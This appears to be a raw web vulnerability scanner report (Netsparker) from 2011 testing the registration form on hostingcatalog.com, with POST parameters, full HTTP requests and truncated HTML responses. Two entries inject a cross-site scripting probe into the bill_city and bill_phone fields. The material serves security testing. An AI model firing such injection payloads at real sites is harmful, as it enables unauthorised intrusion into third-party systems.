value='C4C0A65D598D2DD507C069721C4F6B1EC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>1&1</option><option value='C4C0A65D598D2DD5027851C7F08123226F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Hosting 4 Less</option> </select> </td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Dedicated Servers</option> <option value='C4C0A65D598D2DD5B09EAA837E27E99EC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>iWeb Technology</option><option value='C4C0A65D598D2DD5742719EDAD786DC7C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>SingleHop</option><option value='C4C0A65D598D2DD55AFECC08033DB5786F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Serverconnect@SwedishHost</option><option value='C4C0A65D598D2DD53B29D7BBAB1733C6C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>OnApp - Build Your Cloud</option><option value='C4C0A65D598D2DD52EA967E23EBBD4466F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>UnmeteredServers.com</option> </select> </td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Budget and Free</option> <option value='C4C0A65D598D2DD5AC0BFE0DBDFAA9A4C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>GlowHost $4.95 Hosting</option><option value='C4C0A65D598D2DD5BD2029E73F9E5876C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Unlimited Hosting $2.99/m</option><option value='C4C0A65D598D2DD5EFF17B654D025DC6C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>HostingLocker</option><option value='C4C0A65D598D2DD5CDEA560061B0829FC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Cast-Iron Hosting Review</option><option value='C4C0A65D598D2DD5066E5BCD08C1ABBEC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Web Hosting High</option> </select> </td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Wholesale/Reseller</option> <option value='C4C0A65D598D2DD5E0063667896BB485C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>resell merchant accounts</option><option value='C4C0A65D598D2DD520FD4F283531601E6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Cheap Reseller Hosting</option><option value='C4C0A65D598D2DD558A79A40CE7B1E206F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>PremiumReseller.com</option><option value='C4C0A65D598D2DD52FB1540BE1D9489A6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>30 Day FREE Reseller</option> </select> <input type="hidden" name="param" value=""> </td> </tr> </form> </table> </td> </tr> <tr> <td height="32" align="right" class="headerlink"> <table border="0" cellspacing="0" cellpadding="0"> <tr> <td class="headerlink"><a href="index.php">Home</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink">List Your Company</td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="file.php/advertiseradnetwork.txt">Ad Network</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="advert_login.php">Advertiser Login</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="file.php/adnetworkpartnerprogram.txt">Become a Partner</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="partner">Partner Login</a></td> <td> </td> </tr> </table> </td> </tr> </table> </td> </tr> <tr> <td valign="top"> <div class="regform_intro"> <style type"text/css"> p { font-size: 14px; font-family: arial, verdanna, sans-serif; } h2 { font-size: 16px; font-family: arial, verdanna, sans-serif; font-style: bold; } td.body { color : #000000; font-family : Arial, Tahoma, sans-serif; font-size : 14px; } </style> <h2>Create A Hosting Catalog Account</h2> <p>Wise choice! By listing your web hosting company at Hosting Catalog, you will receive well qualified, targeted traffic from hundreds of people in need of web hosting solutions.</p> <p>There is a minimum deposit of $25 per account and a minimum bid of $.05 per listing. </p> <p>For optimal results, include your listings in the <a href="http://www.hostingcatalog.com/file.php/advertiseradnetwork.txt"><b>Hosting Catalog Ad Network</b></a>. We hand pick the sites in our network, so they are perfectly targeted towards those who are looking for web hosting services. Plus, you'll spend up to 300% less than you would using the big search ad network programs and get exposure to millions of potential hosting customers each month! Just make sure your bids meet the minimum amount for inclusion in the ad network. You can find this info <a href="http://www.hostingcatalog.com/file.php/advertiseradnetwork.txt">here</a></p> <p>Paying through PayPal? <a href="https://www.paypal.com/cgi-bin/webscr?cmd=_xclick&business=paypal%40inetinteractive%2ecom&item_name=Hosting%20Catalog%20Deposit&no_shipping=0&no_note=1¤cy_code=USD&lc=US&bn=PP%2dBuyNowBF&charset=UTF%2d8" target="new"><b>Send us your deposit via PayPal</b></a>. (Our PayPal address is paypal@hostingcatalog.com. Please specify your Hosting Catalog account email if it is different from your PayPal email). </p> <p>Don't worry; your information is safe with us. <b>We respect your privacy and will never sell of give any of your information to a 3rd party.</b></p> <p>Complete the contact and payment information forms below to get your account started and the targeted traffic streaming in!</p> </div> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="10"><img src="images/misc/spacer.gif" width="10" height="1"></td> <td width="100%" valign="top"> <span class="redstar">*</span> <strong>There is a minimum $25 deposit. </strong> <form action="https://www.hostingcatalog.com/register.php" method="post" name="billingForm" onSubmit="return verify();"> <table> <tr> <td valign="top"> <table cellpadding="1" cellspacing="1" border="0" width="100%"> <tr align="left" valign="top" bgcolor="#E1E1E1"> <td class="body"> <B>CONTACT INFORMATION</B></td> </tr> <tr align="left" valign="top"> <td class="body" width="400" nowrap> <table width="100%" border="0" cellspacing="3" cellpadding="0"> <tr> <td class="body" align="left" width="160" nowrap><span class="redstar">*</span>Company Name:</td> <td> <input class="textfield" type="text" name="company_name" size="20" maxlength="30" value="Smith"> <..
Parameters
Parameter
Type
Value
account_type
POST
1
address
POST
3
address2
POST
3
B1
POST
Create An Account!
bill_address
POST
3
bill_address2
POST
3
bill_city
POST
'"--></style></script><script>alert(0x001C8C)</script>
bill_country
POST
240
bill_phone
POST
3
bill_province
POST
3
bill_state
POST
3
bill_zip
POST
3
card_number
POST
3
card_type
POST
1
city
POST
3
company_name
POST
Smith
copy_from_cont
POST
1
country
POST
240
deposit
POST
3
e_mail
POST
netsparker@example.com
expire_date
POST
3
first_name
POST
Smith
last_name
POST
Smith
owner_first_name
POST
Smith
owner_last_name
POST
Smith
password
POST
3
phone
POST
3
promo_code
POST
3
province
POST
3
retype_e_mail
POST
netsparker@example.com
retype_password
POST
3
state
POST
3
zip
POST
3
Request
POST /register.php HTTP/1.1 Referer: http://www.hostingcatalog.com/register.php User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: www.hostingcatalog.com Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060 Content-Length: 583 Accept-Encoding: gzip, deflate account_type=1&address=3&address2=3&B1=Create+An+Account!&bill_address=3&bill_address2=3&bill_city='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x001C8C)%3c%2fscript%3e&bill_country=240&bill_phone=3&bill_province=3&bill_state=3&bill_zip=3&card_number=3&card_type=1&city=3&company_name=Smith©_from_cont=1&country=240&deposit=3&e_mail=netsparker%40example.com&expire_date=3&first_name=Smith&last_name=Smith&owner_first_name=Smith&owner_last_name=Smith&password=3&phone=3&promo_code=3&province=3&retype_e_mail=netsparker%40example.com&retype_password=3&state=3&zip=3
Response
HTTP/1.1 200 OK Date: Sun, 24 Apr 2011 12:49:10 GMT Server: Apache X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <title>Hosting Catalog - List Your Site</title> <link rel="stylesheet" type="text/css" href="style.css"> <SCRIPT LANGUAGE="JavaScript"> <!-- function isNumber(src) { src.value=src.value.replace('$',''); if (src.value.charAt(0)=='0') { alert("Please enter correct numeric value."); src.focus(); return false; } src.value=src.value.replace(',',''); if (src.value.indexOf('.')!=-1) src.value=src.value.substr(0,src.value.indexOf('.')); if (src.value.length==0) src.value='0'; if (parseInt(src.value)<25) { alert("There's a minimum $25 deposit."); src.value='25'; } var i = 0; strField=src.value; for (i=0;i<strField.length; i++) { if ((strField.charAt(i)<'0')||(strField.charAt(i)>'9')) { alert ('Please enter a numeric value.'); src.focus(); return false; } } strField=''; var j=0; for (i=src.value.length-1;i>=0;i--) { strField=src.value.charAt(i)+strField; if ((j+1)%3==0&&i!=0) strField=','+strField; j++; } src.value=strField+'.00'; return true; } // checks date on MM/YY format function checkDate(src) { //checking if year <2002 then card is expired var exp_date=src.value; pattern="[0-9]{2}(/)[0-9]{2}"; res=exp_date.search(pattern); if (res==-1) {alert('Wrong date format!'); src.focus(); return false;} dp = exp_date.split('/'); if ((dp[0]=='00')||(parseInt(dp[0])>12)||(dp[1]=='00')||(dp[1]=='01')) {alert('Wrong date format!'); src.focus(); return false;} return true; } function describe(num) { var url="http://www.hostingcatalog.com/bid_description.php/"+num; windowVar = window.open(url,'desc_win','width=250,height=210,location=0,toolbar=0,directories=0,status=0,menubar=0,scrollbars=0,resizable=1,channelmode=0,fullscreen=0'); windowVar.focus(); } function isMail(src) { src.value=src.value.toLowerCase(); addr=src.value; pattern="^[_a-z0-9-]+(\.[_a-z0-9-]+)*@[_a-z0-9-]+(\.[_a-z0-9-]+)*(\.([a-z]{2,3}))+$"; res=addr.search(pattern); if (res==-1) { alert('Wrong mail format'); src.focus(); return false; } else return true; }// end isMail function isSame(src1,src2,str) { if (src1.value!=src2.value) { alert(str); src1.focus(); return false; } else return true; }// end isSame function isValidCardNumber(src) { var card_number=src.value; flag=true; pattern1="[0-9]{13,16}"; pattern2="[0-9]{4}(-)[0-9]{4}(-)[0-9]{4}(-)[0-9]{1,4}"; res=card_number.search(pattern1); if (res!=-1) { if (card_number.length>16) {flag=false;} } else { res=card_number.search(pattern2); if (res==-1) {flag=false;} if (card_number.length>19) {flag=false;} } if (!flag) { alert('Invalid credit card number'); src.focus(); return false; } else return true; }// end isValidCardNumber function phoneRequired(src) { var strField = new String(src.value); flag=true; if (strField=='') flag=false; /* for (i = 0; i < strField.length; i++) if (strField.charAt(i)!='-' && (strField.charAt(i) < '0' || strField.charAt(i) > '9')) { flag=false; } alert(strField.length); */ if (strField.length < 10) flag=false; if (!flag) { alert ('Please specify a correct phone number'); src.focus(); return false; } return true; }// phoneRequired function verify() { var f1=document.forms['billingForm']; if (!isMail(f1.elements['e_mail'])) return false; if (!isMail(f1.elements['retype_e_mail'])) return false; if (!isSame(f1.elements['password'],f1.elements['retype_password'],'Passwords must coincide!')) return false; if (!isSame(f1.elements['e_mail'],f1.elements['retype_e_mail'],'E-mail addresses must coincide!')) return false; if (f1.elements['company_name'].value=="") { alert('Not all fields are filled'); f1.elements['company_name'].focus(); return false; } if (f1.elements['first_name'].value=="") { alert('Not all fields are filled'); f1.elements['first_name'].focus(); return false; } if (f1.elements['last_name'].value=="") { alert('Not all fields are filled'); f1.elements['last_name'].focus(); return false; } if (f1.elements['address'].value=="") { alert('Not all fields are filled'); f1.elements['address'].focus(); return false; } if (f1.elements['city'].value=="") { alert('Not all fields are filled'); f1.elements['city'].focus(); return false; } if (f1.elements['state'].value=="") { alert('Not all fields are filled'); f1.elements['state'].focus(); return false; } if (f1.elements['zip'].value=="") { alert('Not all fields are filled'); f1.elements['zip'].focus(); return false; } if (f1.elements['password'].value=="") { alert('Not all fields are filled'); f1.elements['password'].focus(); return false; } if (!checkDate(f1.elements['expire_date'])) return false; if (!isValidCardNumber(f1.elements['card_number'])) return false; if (f1.elements['card_number'].value=="") { alert('Not all fields are filled'); f1.elements['card_number'].focus(); return false; } if (f1.elements['owner_first_name'].value=="") { alert('Not all fields are filled'); f1.elements['owner_first_name'].focus(); return false; } if (f1.elements['owner_last_name'].value=="") { alert('Not all fields are filled'); f1.elements['owner_last_name'].focus(); return false; } if (f1.elements['bill_address'].value=="") { alert('Not all fields are filled'); f1.elements['bill_address'].focus(); return false; } if (f1.elements['bill_city'].value=="") { alert('Not all fields are filled'); f1.elements['bill_city'].focus(); return false; } if (f1.elements['bill_country'].value=="") { alert('Not all fields are filled'); f1.elements['bill_country'].focus(); return false; } if (f1.elements['bill_zip'].value=="") { alert('Not all fields are filled'); f1.elements['bill_zip'].focus(); return false; } amount=f1.elements['deposit'].value; card=f1.elements['card_type'].options[f1.elements['card_type'].selectedIndex].text; if (confirm("You're about to charge $"+amount+" to your "+card+".")) return true; else return false; }// verify function checkType(src) { var val=src.options[src.selectedIndex].value; // if (val>1) {document.forms['billingForm'].elements['remember_info'].checked=true;} }// checkType function checkAgain(src) { var sel=document.forms['billingForm'].elements['account_type']; if (!src.checked) sel.selectedIndex=0; } function copyFromContact(src) { if (!src.checked) {return;} var f1=document.forms['billingForm']; f1.elements['bill_address'].value=f1.elements['address'].value; f1.elements['bill_address2'].value=f1.elements['address2'].value; f1.elements['bill_city'].value=f1.elements['city'].value; f1.elements['bill_zip'].value=f1.elements['zip'].value; f1.elements['bill_province'].value=f1.elements['province'].value; f1.elements['bill_state'].selectedIndex=f1.elements['state'].selectedIndex; f1.elements['bill_country'].selectedIndex=f1.elements['country'].selectedIndex; f1.elements['bill_phone'].value=f1.elements['phone'].value; } //--> </SCRIPT> </head> <body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"> <table width="98%" border="0" align="center" cellpadding="0" cellspacing="0"> <tr> <td background="images/header/header_bg.gif"> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td rowspan="3" valign="top"><a href="/index.php"><img src="images/header/logo.gif" width="194" height="130" border="0"></a></td> <td width="100%" height="60" align="right" valign="top"><a href="http://www.liquidweb.com/"><img src="images/header/lw-header.png" width="270" height="36" alt="Liquid Web Logo" title="Liquid Web Hosting" style="border: 0;margin-top: 5px;" /></a></td> <td rowspan="3" align="right" valign="top"><img src="images/header/header_right.gif" width="1" height="130"></td> </tr> <tr> <td height="38" align="right"> <table border="0" cellpadding="0" cellspacing="0"> <form name="top_banner_form" style="margin:0px;" target="_blank" action="http://www.hostingcatalog.com/go.php"> <tr> <td valign="top"><img src="images/header/mostpopular.gif"></td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Unix/Linux</option> <option value='C4C0A65D598D2DD56A42EE258E27DBF4C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Linux VPS Hosting</option><option value='C4C0A65D598D2DD553350E39F5C3FF4F6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Host 5 sites for $5.95</option><option value='C4C0A65D598D2DD5879E0C94D1E1B902C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>HostingLocker</option><option value='C4C0A65D598D2DD5D8306C36C1EDF63FC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>1&1</option><option value='C4C0A65D598D2DD58E0D7123207F3FA06F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Hosting 4 Less</option> </select> </td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Dedicated Servers</option> <option value='C4C0A65D598D2DD5D36EF79BE273BEBAC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>iWeb Technology</option><option value='C4C0A65D598D2DD5E0B5437FC526E3C4C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>SingleHop</option><option value='C4C0A65D598D2DD5CC5AB44B95D0AA1E6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Serverconnect@SwedishHost</option><option value='C4C0A65D598D2DD5F8323D2DEEED2CCAC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>OnApp - Build Your Cloud</option><option value='C4C0A65D598D2DD575CD4269EDEBB0476F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>UnmeteredServers.com</option> </select> </td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Budget and Free</option> <option value='C4C0A65D598D2DD5E82D68B80B7AF4A0C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>GlowHost $4.95 Hosting</option><option value='C4C0A65D598D2DD5D4B9F38B1208FDD9C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Unlimited Hosting $2.99/m</option><option value='C4C0A65D598D2DD5DC39805B456A5EA8C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>HostingLocker</option><option value='C4C0A65D598D2DD52925233F916AB3F6C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Cast-Iron Hosting Review</option><option value='C4C0A65D598D2DD5A12ED03E2C40726CC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Web Hosting High</option> </select> </td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Wholesale/Reseller</option> <option value='C4C0A65D598D2DD546D2184E127D9F8DC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>resell merchant accounts</option><option value='C4C0A65D598D2DD55C4B3820F4CEDA996F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Cheap Reseller Hosting</option><option value='C4C0A65D598D2DD57930791D788C01156F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>PremiumReseller.com</option><option value='C4C0A65D598D2DD5EB30E11CEC9A87AF6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>30 Day FREE Reseller</option> </select> <input type="hidden" name="param" value=""> </td> </tr> </form> </table> </td> </tr> <tr> <td height="32" align="right" class="headerlink"> <table border="0" cellspacing="0" cellpadding="0"> <tr> <td class="headerlink"><a href="index.php">Home</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink">List Your Company</td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="file.php/advertiseradnetwork.txt">Ad Network</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="advert_login.php">Advertiser Login</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="file.php/adnetworkpartnerprogram.txt">Become a Partner</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="partner">Partner Login</a></td> <td> </td> </tr> </table> </td> </tr> </table> </td> </tr> <tr> <td valign="top"> <div class="regform_intro"> <style type"text/css"> p { font-size: 14px; font-family: arial, verdanna, sans-serif; } h2 { font-size: 16px; font-family: arial, verdanna, sans-serif; font-style: bold; } td.body { color : #000000; font-family : Arial, Tahoma, sans-serif; font-size : 14px; } </style> <h2>Create A Hosting Catalog Account</h2> <p>Wise choice! By listing your web hosting company at Hosting Catalog, you will receive well qualified, targeted traffic from hundreds of people in need of web hosting solutions.</p> <p>There is a minimum deposit of $25 per account and a minimum bid of $.05 per listing. </p> <p>For optimal results, include your listings in the <a href="http://www.hostingcatalog.com/file.php/advertiseradnetwork.txt"><b>Hosting Catalog Ad Network</b></a>. We hand pick the sites in our network, so they are perfectly targeted towards those who are looking for web hosting services. Plus, you'll spend up to 300% less than you would using the big search ad network programs and get exposure to millions of potential hosting customers each month! Just make sure your bids meet the minimum amount for inclusion in the ad network. You can find this info <a href="http://www.hostingcatalog.com/file.php/advertiseradnetwork.txt">here</a></p> <p>Paying through PayPal? <a href="https://www.paypal.com/cgi-bin/webscr?cmd=_xclick&business=paypal%40inetinteractive%2ecom&item_name=Hosting%20Catalog%20Deposit&no_shipping=0&no_note=1¤cy_code=USD&lc=US&bn=PP%2dBuyNowBF&charset=UTF%2d8" target="new"><b>Send us your deposit via PayPal</b></a>. (Our PayPal address is paypal@hostingcatalog.com. Please specify your Hosting Catalog account email if it is different from your PayPal email). </p> <p>Don't worry; your information is safe with us. <b>We respect your privacy and will never sell of give any of your information to a 3rd party.</b></p> <p>Complete the contact and payment information forms below to get your account started and the targeted traffic streaming in!</p> </div> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="10"><img src="images/misc/spacer.gif" width="10" height="1"></td> <td width="100%" valign="top"> <span class="redstar">*</span> <strong>There is a minimum $25 deposit. </strong> <form action="https://www.hostingcatalog.com/register.php" method="post" name="billingForm" onSubmit="return verify();"> <table> <tr> <td valign="top"> <table cellpadding="1" cellspacing="1" border="0" width="100%"> <tr align="left" valign="top" bgcolor="#E1E1E1"> <td class="body"> <B>CONTACT INFORMATION</B></td> </tr> <tr align="left" valign="top"> <td class="body" width="400" nowrap> <table width="100%" border="0" cellspacing="3" cellpadding="0"> <tr> <td class="body" align="left" width="160" nowrap><span class="redstar">*</span>Company Name:</td> <td> <input class="textfield" type="text" name="company_name" size="20" maxlength="30" value="Smith"> <..
Parameters
Parameter
Type
Value
account_type
POST
1
address
POST
3
address2
POST
3
B1
POST
Create An Account!
bill_address
POST
3
bill_address2
POST
3
bill_city
POST
3
bill_country
POST
240
bill_phone
POST
'"--></style></script><script>alert(0x001C9C)</script>
bill_province
POST
3
bill_state
POST
3
bill_zip
POST
3
card_number
POST
3
card_type
POST
1
city
POST
3
company_name
POST
Smith
copy_from_cont
POST
1
country
POST
240
deposit
POST
3
e_mail
POST
netsparker@example.com
expire_date
POST
3
first_name
POST
Smith
last_name
POST
Smith
owner_first_name
POST
Smith
owner_last_name
POST
Smith
password
POST
3
phone
POST
3
promo_code
POST
3
province
POST
3
retype_e_mail
POST
netsparker@example.com
retype_password
POST
3
state
POST
3
zip
POST
3
Request
POST /register.php HTTP/1.1 Referer: http://www.hostingcatalog.com/register.php User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: www.hostingcatalog.com Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060 Content-Length: 583 Accept-Encoding: gzip, deflate account_type=1&address=3&address2=3&B1=Create+An+Account!&bill_address=3&bill_address2=3&bill_city=3&bill_country=240&bill_phone='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x001C9C)%3c%2fscript%3e&bill_province=3&bill_state=3&bill_zip=3&card_number=3&card_type=1&city=3&company_name=Smith©_from_cont=1&country=240&deposit=3&e_mail=netsparker%40example.com&expire_date=3&first_name=Smith&last_name=Smith&owner_first_name=Smith&owner_last_name=Smith&password=3&phone=3&promo_code=3&province=3&retype_e_mail=netsparker%40example.com&retype_password=3&state=3&zip=3
Response
HTTP/1.1 200 OK Date: Sun, 24 Apr 2011 12:49:22 GMT Server: Apache X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <title>Hosting Catalog - List Your Site</title> <link rel="stylesheet" type="text/css" href="style.css"> <SCRIPT LANGUAGE="JavaScript"> <!-- function isNumber(src) { src.value=src.value.replace('$',''); if (src.value.charAt(0)=='0') { alert("Please enter correct numeric value."); src.focus(); return false; } src.value=src.value.replace(',',''); if (src.value.indexOf('.')!=-1) src.value=src.value.substr(0,src.value.indexOf('.')); if (src.value.length==0) src.value='0'; if (parseInt(src.value)<25) { alert("There's a minimum $25 deposit."); src.value='25'; } var i = 0; strField=src.value; for (i=0;i<strField.length; i++) { if ((strField.charAt(i)<'0')||(strField.charAt(i)>'9')) { alert ('Please enter a numeric value.'); src.focus(); return false; } } strField=''; var j=0; for (i=src.value.length-1;i>=0;i--) { strField=src.value.charAt(i)+strField; if ((j+1)%3==0&&i!=0) strField=','+strField; j++; } src.value=strField+'.00'; return true; } // checks date on MM/YY format function checkDate(src) { //checking if year <2002 then card is expired var exp_date=src.value; pattern="[0-9]{2}(/)[0-9]{2}"; res=exp_date.search(pattern); if (res==-1) {alert('Wrong date format!'); src.focus(); return false;} dp = exp_date.split('/'); if ((dp[0]=='00')||(parseInt(dp[0])>12)||(dp[1]=='00')||(dp[1]=='01')) {alert('Wrong date format!'); src.focus(); return false;} return true; } function describe(num) { var url="http://www.hostingcatalog.com/bid_description.php/"+num; windowVar = window.open(url,'desc_win','width=250,height=210,location=0,toolbar=0,directories=0,status=0,menubar=0,scrollbars=0,resizable=1,channelmode=0,fullscreen=0'); windowVar.focus(); } function isMail(src) { src.value=src.value.toLowerCase(); addr=src.value; pattern="^[_a-z0-9-]+(\.[_a-z0-9-]+)*@[_a-z0-9-]+(\.[_a-z0-9-]+)*(\.([a-z]{2,3}))+$"; res=addr.search(pattern); if (res==-1) { alert('Wrong mail format'); src.focus(); return false; } else return true; }// end isMail function isSame(src1,src2,str) { if (src1.value!=src2.value) { alert(str); src1.focus(); return false; } else return true; }// end isSame function isValidCardNumber(src) { var card_number=src.value; flag=true; pattern1="[0-9]{13,16}"; pattern2="[0-9]{4}(-)[0-9]{4}(-)[0-9]{4}(-)[0-9]{1,4}"; res=card_number.search(pattern1); if (res!=-1) { if (card_number.length>16) {flag=false;} } else { res=card_number.search(pattern2); if (res==-1) {flag=false;} if (card_number.length>19) {flag=false;} } if (!flag) { alert('Invalid credit card number'); src.focus(); return false; } else return true; }// end isValidCardNumber function phoneRequired(src) { var strField = new String(src.value); flag=true; if (strField=='') flag=false; /* for (i = 0; i < strField.length; i++) if (strField.charAt(i)!='-' && (strField.charAt(i) < '0' || strField.charAt(i) > '9')) { flag=false; } alert(strField.length); */ if (strField.length < 10) flag=false; if (!flag) { alert ('Please specify a correct phone number'); src.focus(); return false; } return true; }// phoneRequired function verify() { var f1=document.forms['billingForm']; if (!isMail(f1.elements['e_mail'])) return false; if (!isMail(f1.elements['retype_e_mail'])) return false; if (!isSame(f1.elements['password'],f1.elements['retype_password'],'Passwords must coincide!')) return false; if (!isSame(f1.elements['e_mail'],f1.elements['retype_e_mail'],'E-mail addresses must coincide!')) return false; if (f1.elements['company_name'].value=="") { alert('Not all fields are filled'); f1.elements['company_name'].focus(); return false; } if (f1.elements['first_name'].value=="") { alert('Not all fields are filled'); f1.elements['first_name'].focus(); return false; } if (f1.elements['last_name'].value=="") { alert('Not all fields are filled'); f1.elements['last_name'].focus(); return false; } if (f1.elements['address'].value=="") { alert('Not all fields are filled'); f1.elements['address'].focus(); return false; } if (f1.elements['city'].value=="") { alert('Not all fields are filled'); f1.elements['city'].focus(); return false; } if (f1.elements['state'].value=="") { alert('Not all fields are filled'); f1.elements['state'].focus(); return false; } if (f1.elements['zip'].value=="") { alert('Not all fields are filled'); f1.elements['zip'].focus(); return false; } if (f1.elements['password'].value=="") { alert('Not all fields are filled'); f1.elements['password'].focus(); return false; } if (!checkDate(f1.elements['expire_date'])) return false; if (!isValidCardNumber(f1.elements['card_number'])) return false; if (f1.elements['card_number'].value=="") { alert('Not all fields are filled'); f1.elements['card_number'].focus(); return false; } if (f1.elements['owner_first_name'].value=="") { alert('Not all fields are filled'); f1.elements['owner_first_name'].focus(); return false; } if (f1.elements['owner_last_name'].value=="") { alert('Not all fields are filled'); f1.elements['owner_last_name'].focus(); return false; } if (f1.elements['bill_address'].value=="") { alert('Not all fields are filled'); f1.elements['bill_address'].focus(); return false; } if (f1.elements['bill_city'].value=="") { alert('Not all fields are filled'); f1.elements['bill_city'].focus(); return false; } if (f1.elements['bill_country'].value=="") { alert('Not all fields are filled'); f1.elements['bill_country'].focus(); return false; } if (f1.elements['bill_zip'].value=="") { alert('Not all fields are filled'); f1.elements['bill_zip'].focus(); return false; } amount=f1.elements['deposit'].value; card=f1.elements['card_type'].options[f1.elements['card_type'].selectedIndex].text; if (confirm("You're about to charge $"+amount+" to your "+card+".")) return true; else return false; }// verify function checkType(src) { var val=src.options[src.selectedIndex].value; // if (val>1) {document.forms['billingForm'].elements['remember_info'].checked=true;} }// checkType function checkAgain(src) { var sel=document.forms['billingForm'].elements['account_type']; if (!src.checked) sel.selectedIndex=0; } function copyFromContact(src) { if (!src.checked) {return;} var f1=document.forms['billingForm']; f1.elements['bill_address'].value=f1.elements['address'].value; f1.elements['bill_address2'].value=f1.elements['address2'].value; f1.elements['bill_city'].value=f1.elements['city'].value; f1.elements['bill_zip'].value=f1.elements['zip'].value; f1.elements['bill_province'].value=f1.elements['province'].value; f1.elements['bill_state'].selectedIndex=f1.elements['state'].selectedIndex; f1.elements['bill_country'].selectedIndex=f1.elements['country'].selectedIndex; f1.elements['bill_phone'].value=f1.elements['phone'].value; } //--> </SCRIPT> </head> <body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"> <table 